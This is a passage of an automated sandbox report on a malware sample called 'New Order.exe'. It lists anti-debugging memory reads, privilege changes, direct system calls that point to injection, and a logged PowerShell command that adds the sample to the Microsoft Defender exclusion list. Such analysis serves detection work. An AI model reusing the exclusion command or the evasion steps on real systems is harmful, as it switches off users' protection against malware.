                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A2C3 mov eax, dword ptr fs:[00000030h]8_2_0180A2C3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180A2C3 mov eax, dword ptr fs:[00000030h]8_2_0180A2C3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017F823B mov eax, dword ptr fs:[00000030h]8_2_017F823B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018102E1 mov eax, dword ptr fs:[00000030h]8_2_018102E1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018102E1 mov eax, dword ptr fs:[00000030h]8_2_018102E1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018102E1 mov eax, dword ptr fs:[00000030h]8_2_018102E1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01888243 mov eax, dword ptr fs:[00000030h]8_2_01888243
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01888243 mov ecx, dword ptr fs:[00000030h]8_2_01888243
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01806259 mov eax, dword ptr fs:[00000030h]8_2_01806259
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018BA250 mov eax, dword ptr fs:[00000030h]8_2_018BA250
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018BA250 mov eax, dword ptr fs:[00000030h]8_2_018BA250
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01804260 mov eax, dword ptr fs:[00000030h]8_2_01804260
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01804260 mov eax, dword ptr fs:[00000030h]8_2_01804260
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01804260 mov eax, dword ptr fs:[00000030h]8_2_01804260
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B0274 mov eax, dword ptr fs:[00000030h]8_2_018B0274
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01802582 mov eax, dword ptr fs:[00000030h]8_2_01802582
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01802582 mov ecx, dword ptr fs:[00000030h]8_2_01802582
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01834588 mov eax, dword ptr fs:[00000030h]8_2_01834588
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E59C mov eax, dword ptr fs:[00000030h]8_2_0183E59C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018805A7 mov eax, dword ptr fs:[00000030h]8_2_018805A7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018805A7 mov eax, dword ptr fs:[00000030h]8_2_018805A7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018805A7 mov eax, dword ptr fs:[00000030h]8_2_018805A7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018245B1 mov eax, dword ptr fs:[00000030h]8_2_018245B1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018245B1 mov eax, dword ptr fs:[00000030h]8_2_018245B1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E5CF mov eax, dword ptr fs:[00000030h]8_2_0183E5CF
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E5CF mov eax, dword ptr fs:[00000030h]8_2_0183E5CF
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018065D0 mov eax, dword ptr fs:[00000030h]8_2_018065D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183A5D0 mov eax, dword ptr fs:[00000030h]8_2_0183A5D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183A5D0 mov eax, dword ptr fs:[00000030h]8_2_0183A5D0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018025E0 mov eax, dword ptr fs:[00000030h]8_2_018025E0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E5E7 mov eax, dword ptr fs:[00000030h]8_2_0182E5E7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E5E7 mov eax, dword ptr fs:[00000030h]8_2_0182E5E7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E5E7 mov eax, dword ptr fs:[00000030h]8_2_0182E5E7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E5E7 mov eax, dword ptr fs:[00000030h]8_2_0182E5E7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E5E7 mov eax, dword ptr fs:[00000030h]8_2_0182E5E7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E5E7 mov eax, dword ptr fs:[00000030h]8_2_0182E5E7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E5E7 mov eax, dword ptr fs:[00000030h]8_2_0182E5E7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E5E7 mov eax, dword ptr fs:[00000030h]8_2_0182E5E7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183C5ED mov eax, dword ptr fs:[00000030h]8_2_0183C5ED
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183C5ED mov eax, dword ptr fs:[00000030h]8_2_0183C5ED
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01896500 mov eax, dword ptr fs:[00000030h]8_2_01896500
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D4500 mov eax, dword ptr fs:[00000030h]8_2_018D4500
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D4500 mov eax, dword ptr fs:[00000030h]8_2_018D4500
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D4500 mov eax, dword ptr fs:[00000030h]8_2_018D4500
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D4500 mov eax, dword ptr fs:[00000030h]8_2_018D4500
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D4500 mov eax, dword ptr fs:[00000030h]8_2_018D4500
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D4500 mov eax, dword ptr fs:[00000030h]8_2_018D4500
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018D4500 mov eax, dword ptr fs:[00000030h]8_2_018D4500
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810535 mov eax, dword ptr fs:[00000030h]8_2_01810535
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810535 mov eax, dword ptr fs:[00000030h]8_2_01810535
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810535 mov eax, dword ptr fs:[00000030h]8_2_01810535
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810535 mov eax, dword ptr fs:[00000030h]8_2_01810535
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810535 mov eax, dword ptr fs:[00000030h]8_2_01810535
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810535 mov eax, dword ptr fs:[00000030h]8_2_01810535
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E53E mov eax, dword ptr fs:[00000030h]8_2_0182E53E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E53E mov eax, dword ptr fs:[00000030h]8_2_0182E53E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E53E mov eax, dword ptr fs:[00000030h]8_2_0182E53E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E53E mov eax, dword ptr fs:[00000030h]8_2_0182E53E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182E53E mov eax, dword ptr fs:[00000030h]8_2_0182E53E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01808550 mov eax, dword ptr fs:[00000030h]8_2_01808550
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01808550 mov eax, dword ptr fs:[00000030h]8_2_01808550
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183656A mov eax, dword ptr fs:[00000030h]8_2_0183656A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183656A mov eax, dword ptr fs:[00000030h]8_2_0183656A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183656A mov eax, dword ptr fs:[00000030h]8_2_0183656A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018BA49A mov eax, dword ptr fs:[00000030h]8_2_018BA49A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017F645D mov eax, dword ptr fs:[00000030h]8_2_017F645D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018064AB mov eax, dword ptr fs:[00000030h]8_2_018064AB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018344B0 mov ecx, dword ptr fs:[00000030h]8_2_018344B0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188A4B0 mov eax, dword ptr fs:[00000030h]8_2_0188A4B0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FC427 mov eax, dword ptr fs:[00000030h]8_2_017FC427
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FE420 mov eax, dword ptr fs:[00000030h]8_2_017FE420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FE420 mov eax, dword ptr fs:[00000030h]8_2_017FE420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_017FE420 mov eax, dword ptr fs:[00000030h]8_2_017FE420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018004E5 mov ecx, dword ptr fs:[00000030h]8_2_018004E5
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01838402 mov eax, dword ptr fs:[00000030h]8_2_01838402
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01838402 mov eax, dword ptr fs:[00000030h]8_2_01838402
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01838402 mov eax, dword ptr fs:[00000030h]8_2_01838402
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01886420 mov eax, dword ptr fs:[00000030h]8_2_01886420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01886420 mov eax, dword ptr fs:[00000030h]8_2_01886420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01886420 mov eax, dword ptr fs:[00000030h]8_2_01886420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01886420 mov eax, dword ptr fs:[00000030h]8_2_01886420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01886420 mov eax, dword ptr fs:[00000030h]8_2_01886420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01886420 mov eax, dword ptr fs:[00000030h]8_2_01886420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01886420 mov eax, dword ptr fs:[00000030h]8_2_01886420
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183A430 mov eax, dword ptr fs:[00000030h]8_2_0183A430
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E443 mov eax, dword ptr fs:[00000030h]8_2_0183E443
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E443 mov eax, dword ptr fs:[00000030h]8_2_0183E443
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E443 mov eax, dword ptr fs:[00000030h]8_2_0183E443
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E443 mov eax, dword ptr fs:[00000030h]8_2_0183E443
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E443 mov eax, dword ptr fs:[00000030h]8_2_0183E443
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E443 mov eax, dword ptr fs:[00000030h]8_2_0183E443
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E443 mov eax, dword ptr fs:[00000030h]8_2_0183E443
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183E443 mov eax, dword ptr fs:[00000030h]8_2_0183E443
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182245A mov eax, dword ptr fs:[00000030h]8_2_0182245A
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018BA456 mov eax, dword ptr fs:[00000030h]8_2_018BA456
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188C460 mov ecx, dword ptr fs:[00000030h]8_2_0188C460
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182A470 mov eax, dword ptr fs:[00000030h]8_2_0182A470
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182A470 mov eax, dword ptr fs:[00000030h]8_2_0182A470
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0182A470 mov eax, dword ptr fs:[00000030h]8_2_0182A470
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018A678E mov eax, dword ptr fs:[00000030h]8_2_018A678E
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018B47A0 mov eax, dword ptr fs:[00000030h]8_2_018B47A0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018007AF mov eax, dword ptr fs:[00000030h]8_2_018007AF
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0180C7C0 mov eax, dword ptr fs:[00000030h]8_2_0180C7C0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018807C3 mov eax, dword ptr fs:[00000030h]8_2_018807C3
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188E7E1 mov eax, dword ptr fs:[00000030h]8_2_0188E7E1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018227ED mov eax, dword ptr fs:[00000030h]8_2_018227ED
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018227ED mov eax, dword ptr fs:[00000030h]8_2_018227ED
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018227ED mov eax, dword ptr fs:[00000030h]8_2_018227ED
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018047FB mov eax, dword ptr fs:[00000030h]8_2_018047FB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018047FB mov eax, dword ptr fs:[00000030h]8_2_018047FB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183C700 mov eax, dword ptr fs:[00000030h]8_2_0183C700
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01800710 mov eax, dword ptr fs:[00000030h]8_2_01800710
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01830710 mov eax, dword ptr fs:[00000030h]8_2_01830710
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183C720 mov eax, dword ptr fs:[00000030h]8_2_0183C720
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183C720 mov eax, dword ptr fs:[00000030h]8_2_0183C720
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187C730 mov eax, dword ptr fs:[00000030h]8_2_0187C730
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183273C mov eax, dword ptr fs:[00000030h]8_2_0183273C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183273C mov ecx, dword ptr fs:[00000030h]8_2_0183273C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183273C mov eax, dword ptr fs:[00000030h]8_2_0183273C
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183674D mov esi, dword ptr fs:[00000030h]8_2_0183674D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183674D mov eax, dword ptr fs:[00000030h]8_2_0183674D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183674D mov eax, dword ptr fs:[00000030h]8_2_0183674D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01800750 mov eax, dword ptr fs:[00000030h]8_2_01800750
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842750 mov eax, dword ptr fs:[00000030h]8_2_01842750
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01842750 mov eax, dword ptr fs:[00000030h]8_2_01842750
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0188E75D mov eax, dword ptr fs:[00000030h]8_2_0188E75D
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01884755 mov eax, dword ptr fs:[00000030h]8_2_01884755
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01808770 mov eax, dword ptr fs:[00000030h]8_2_01808770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01810770 mov eax, dword ptr fs:[00000030h]8_2_01810770
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01804690 mov eax, dword ptr fs:[00000030h]8_2_01804690
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_01804690 mov eax, dword ptr fs:[00000030h]8_2_01804690
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183C6A6 mov eax, dword ptr fs:[00000030h]8_2_0183C6A6
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018366B0 mov eax, dword ptr fs:[00000030h]8_2_018366B0
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183A6C7 mov ebx, dword ptr fs:[00000030h]8_2_0183A6C7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0183A6C7 mov eax, dword ptr fs:[00000030h]8_2_0183A6C7
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187E6F2 mov eax, dword ptr fs:[00000030h]8_2_0187E6F2
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187E6F2 mov eax, dword ptr fs:[00000030h]8_2_0187E6F2
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187E6F2 mov eax, dword ptr fs:[00000030h]8_2_0187E6F2
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0187E6F2 mov eax, dword ptr fs:[00000030h]8_2_0187E6F2
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018806F1 mov eax, dword ptr fs:[00000030h]8_2_018806F1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018806F1 mov eax, dword ptr fs:[00000030h]8_2_018806F1
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181260B mov eax, dword ptr fs:[00000030h]8_2_0181260B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181260B mov eax, dword ptr fs:[00000030h]8_2_0181260B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181260B mov eax, dword ptr fs:[00000030h]8_2_0181260B
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0181260B mov eax, dword ptr fs:[00000030h]8_2_0181260B
                Source: C:\Users\user\Desktop\New Order.exe; Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                Source: C:\Users\user\Desktop\New Order.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\New Order.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe"
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtResumeThread: Direct from: 0x773836AC
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtMapViewOfSection: Direct from: 0x77382D1C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtWriteVirtualMemory: Direct from: 0x77382E3C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtProtectVirtualMemory: Direct from: 0x77382F9C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtSetInformationThread: Direct from: 0x773763F9
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtCreateMutant: Direct from: 0x773835CC
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtNotifyChangeKey: Direct from: 0x77383C2C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtSetInformationProcess: Direct from: 0x77382C5C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtCreateUserProcess: Direct from: 0x7738371C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtQueryInformationProcess: Direct from: 0x77382C26
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtResumeThread: Direct from: 0x77382FBC
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtWriteVirtualMemory: Direct from: 0x7738490C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtAllocateVirtualMemory: Direct from: 0x77383C9C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtReadFile: Direct from: 0x77382ADC
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtAllocateVirtualMemory: Direct from: 0x77382BFC
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtDelayExecution: Direct from: 0x77382DDC
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtQuerySystemInformation: Direct from: 0x77382DFC
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtOpenSection: Direct from: 0x77382E0C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtQuerySystemInformation: Direct from: 0x773848CC
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtReadVirtualMemory: Direct from: 0x77382E8C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtCreateKey: Direct from: 0x77382C6C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtAllocateVirtualMemory: Direct from: 0x773848EC
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtQueryAttributesFile: Direct from: 0x77382E6C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtSetInformationThread: Direct from: 0x77382B4C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtTerminateThread: Direct from: 0x77382FCC
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtQueryInformationToken: Direct from: 0x77382CAC
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtOpenKeyEx: Direct from: 0x77382B9C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtAllocateVirtualMemory: Direct from: 0x77382BEC
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtDeviceIoControlFile: Direct from: 0x77382AEC
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe; NtCreateFile: Direct from: 0x77382FEC
